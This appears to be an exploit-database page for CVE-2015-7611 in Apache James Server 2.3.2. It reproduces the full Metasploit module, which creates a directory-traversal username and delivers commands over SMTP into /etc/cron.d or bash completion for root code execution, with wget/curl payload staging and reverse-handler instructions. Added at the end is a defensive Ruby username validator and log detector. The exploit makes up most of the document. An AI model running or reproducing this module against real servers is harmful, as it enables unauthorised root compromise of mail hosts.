
Apache James Server 2.3.2 Insecure User Creation / Arbitrary File Write Vulnerability


This Wind


Author of published content: Metasploit        Vulnerability severity level: High

Description:

This Metasploit module exploits a vulnerability caused by a lack of input validation when creating a user. Messages for a given user are stored in a directory partially defined by the username. By creating a user whose username is a directory traversal payload, commands can be written to a given directory. To use this module with the cron exploitation method, run the exploit with the given payload, host and port. After running the exploit, the payload will execute within 60 seconds. Because cron runs differently on some Linux operating systems such as Ubuntu, it may be preferable to set the target to Bash Completion, as the cron method may not work. If the target is set to Bash Completion, start a listener with the given payload, host and port before running the exploit. After running the exploit, the payload executes when a user logs into the system. For this exploitation method, bash completion must be enabled to gain code execution. This method leaves an Apache James mail object artifact in the /etc/bash_completion.d directory and the malicious user account.

CVE ID: CVE-2015-7611

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write",
      'Description'    => %q{
        This module exploits a vulnerability that exists due to a lack of input
        validation when creating a user. Messages for a given user are stored
        in a directory partially defined by the username. By creating a user
        with a directory traversal payload as the username, commands can be
        written to a given directory. To use this module with the cron
        exploitation method, run the exploit using the given payload, host, and
        port. After running the exploit, the payload will be executed within 60
        seconds. Due to differences in how cron may run in certain Linux
        operating systems such as Ubuntu, it may be preferable to set the
        target to Bash Completion as the cron method may not work. If the target
        is set to Bash completion, start a listener using the given payload,
        host, and port before running the exploit. After running the exploit,
        the payload will be executed when a user logs into the system. For this
        exploitation method, bash completion must be enabled to gain code
        execution. This exploitation method will leave an Apache James mail
        object artifact in the /etc/bash_completion.d directory and the
        malicious user account.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Palaczynski Jakub', # Discovery
        'Matthew Aberegg',   # Metasploit
        'Michael Burkey'     # Metasploit
      ],
      'References'     =>
      [
        [ 'CVE', '2015-7611' ],
        [ 'EDB', '35513' ],
        [ 'URL', 'https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf' ]
      ],
      'Platform'       => 'linux',
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'Targets'        =>
      [
        [ 'Bash Completion', {
          'ExploitPath' => 'bash_completion.d',
          'ExploitPrepend' => '',
          'DefaultOptions' => { 'DisablePayloadHandler' => true, 'WfsDelay' => 0 }
        } ],
        [ 'Cron', {
          'ExploitPath' => 'cron.d',
          'ExploitPrepend' => '* * * * * root ',
          'DefaultOptions' => { 'DisablePayloadHandler' => false, 'WfsDelay' => 90 }
        } ]
      ],
      'Privileged'     => true,
      'DisclosureDate' => "Oct 1 2015",
      'DefaultTarget'  => 1,
      'CmdStagerFlavor'=> [ 'bourne', 'echo', 'printf', 'wget', 'curl' ]
    ))
    register_options(
      [
        OptString.new('USERNAME', [ true, 'Root username for James remote administration tool', 'root' ]),
        OptString.new('PASSWORD', [ true, 'Root password for James remote administration tool', 'root' ]),
        OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ]),
        OptString.new('POP3PORT', [false, 'Port for POP3 Apache James Service', '110' ]),
        Opt::RPORT(25)
      ])
    import_target_defaults
  end

  def check
    # SMTP service check
    connect
    smtp_banner = sock.get_once
    disconnect
    unless smtp_banner.to_s.include? "JAMES SMTP Server"
      return CheckCode::Safe("Target port #{rport} is not a JAMES SMTP server")
    end

    # James Remote Administration Tool service check
    connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']})
    admin_banner = sock.get_once
    disconnect
    unless admin_banner.to_s.include? "JAMES Remote Administration Tool"
      return CheckCode::Safe("Target is not JAMES Remote Administration Tool")
    end

    # Get version number
    version = admin_banner.scan(/JAMES Remote Administration Tool ([\d\.]+)/).flatten.first
    # Null check
    unless version
      return CheckCode::Detected("Could not determine JAMES Remote Administration Tool version")
    end
    # Create version objects
    target_version = Gem::Version.new(version)
    vulnerable_version = Gem::Version.new("2.3.2")

    # Check version number
    if target_version > vulnerable_version
      return CheckCode::Safe
    elsif target_version == vulnerable_version
      return CheckCode::Appears
    elsif target_version < vulnerable_version
      return CheckCode::Detected("Version #{version} of JAMES Remote Administration Tool may be vulnerable")
    end
  end

  def execute_james_admin_tool_command(cmd)
    username = datastore['USERNAME']
    password = datastore['PASSWORD']
    connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']})
    sock.get_once
    sock.puts(username + "\n")
    sock.get_once
    sock.puts(password + "\n")
    sock.get_once
    sock.puts(cmd)
    sock.get_once
    sock.puts("quit\n")
    disconnect
  end

  def cleanup
    return unless target['ExploitPath'] == "cron.d"
    # Delete mail objects containing payload from cron.d
    username = "../../../../../../../../etc/cron.d"
    password = @account_password
    begin
      connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['POP3PORT']})
      sock.get_once
      sock.puts("USER #{username}\r\n")
      sock.get_once
      sock.puts("PASS #{password}\r\n")
      sock.get_once
      sock.puts("dele 1\r\n")
      sock.get_once
      sock.puts("quit\r\n")
      disconnect
    rescue
      print_bad("Failed to remove payload message for user '../../../../../../../../etc/cron.d' with password '#{@account_password}'")
    end

    # Delete malicious user
    delete_user_command = "deluser ../../../../../../../../etc/cron.d\n"
    execute_james_admin_tool_command(delete_user_command)
  end

  def execute_command(cmd, opts = {})
    # Create malicious user with randomized password (message objects for this user will now be stored in /etc/bash_completion.d or /etc/cron.d)
    exploit_path = target['ExploitPath']
    @account_password = Rex::Text.rand_text_alpha(8..12)
    add_user_command = "adduser ../../../../../../../../etc/#{exploit_path} #{@account_password}\n"
    execute_james_admin_tool_command(add_user_command)

    # Send payload via SMTP
    payload_prepend = target['ExploitPrepend']
    connect
    sock.puts("ehlo admin@apache.com\r\n")
    sock.get_once
    sock.puts("mail from: <'@apache.com>\r\n")
    sock.get_once
    sock.puts("rcpt to: <../../../../../../../../etc/#{exploit_path}>\r\n")
    sock.get_once
    sock.puts("data\r\n")
    sock.get_once
    sock.puts("From: admin@apache.com\r\n")
    sock.puts("\r\n")
    sock.puts("'\n")
    sock.puts("#{payload_prepend}#{cmd}\n")
    sock.puts("\r\n.\r\n")
    sock.get_once
    sock.puts("quit\r\n")
    sock.get_once
    disconnect
  end

  def execute_cmdstager_end(opts)
    if target['ExploitPath'] == "cron.d"
      print_status("Waiting for cron to execute payload...")
    else
      print_status("Payload will be triggered when someone logs onto the target")
      print_warning("You need to start your handler: 'handler -H #{datastore['LHOST']} -P #{datastore['LPORT']} -p #{datastore['PAYLOAD']}'")
      print_warning("After payload is triggered, delete the message and account of user '../../../../../../../../etc/bash_completion.d' with password '#{@account_password}' to fully clean up exploit artifacts.")
    end
  end

  def exploit
    execute_cmdstager(background: true)
  end

end
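The root cause above is that the username is joined into a filesystem path with no validation. As an added example (not part of the Metasploit module or of Apache James itself), here is the check a hardened adduser/RCPT handler needs, together with a detector run over constructed log lines; the mail-store root and the log line formats are assumptions.

```ruby
require 'pathname'

# Assumed location of the per-user inbox directories (not a real James path).
MAIL_STORE_ROOT = '/opt/james/apps/james/var/mail/inboxes'

# Classify a username: nil when safe, otherwise a symbol naming the problem.
def username_problem(username, root = MAIL_STORE_ROOT)
  return :empty if username.nil? || username.strip.empty?
  return :control_char if username.match?(/[\x00-\x1f]/)
  # The directory the store would use for this user must stay inside the root;
  # Pathname#+ resolves '..' lexically, so a traversal payload lands outside it.
  root_path = Pathname.new(root)
  resolved = (root_path + username).cleanpath
  return :escapes_root unless resolved.to_s.start_with?("#{root_path}/")
  # Allowlist so that '/', '\\' and other separators never reach the filesystem.
  return :bad_chars unless username.match?(/\A[A-Za-z0-9][A-Za-z0-9._@-]*\z/)
  return :dot_dot if username.include?('..')
  nil
end

# Extract the account from an admin "adduser NAME PASS" line or an SMTP "RCPT TO:<NAME>" line (constructed formats).
def account_in_line(line)
  if (m = line.match(/\badduser\s+(\S+)/i))
    m[1]
  elsif (m = line.match(/RCPT TO:\s*<([^>@]+)(?:@[^>]*)?>/i))
    m[1]
  end
end

# Return [line, account, problem] for each log line naming an unsafe account.
def suspicious_entries(log_text)
  log_text.each_line.map(&:chomp).map do |line|
    name = account_in_line(line)
    next unless name
    problem = username_problem(name)
    [line, name, problem] if problem
  end.compact
end

# Constructed sample lines, not real James log output.
SAMPLE_LOG = <<~LOG
  ADMIN adduser ../../../../../../../../etc/cron.d Xk9pQr2v
  SMTP RCPT TO:<../../../../../../../../etc/cron.d>
  SMTP RCPT TO:<alice@example.com>
  ADMIN adduser bob hunter2
LOG
if __FILE__ == $0
  suspicious_entries(SAMPLE_LOG).each { |l, n, p| puts "#{p}: #{n}  <- #{l}" }
end
```

The path-containment check catches the traversal payload on its own; the allowlist is the cheaper first line of defence and also blocks names that stay inside the root but still contain separators.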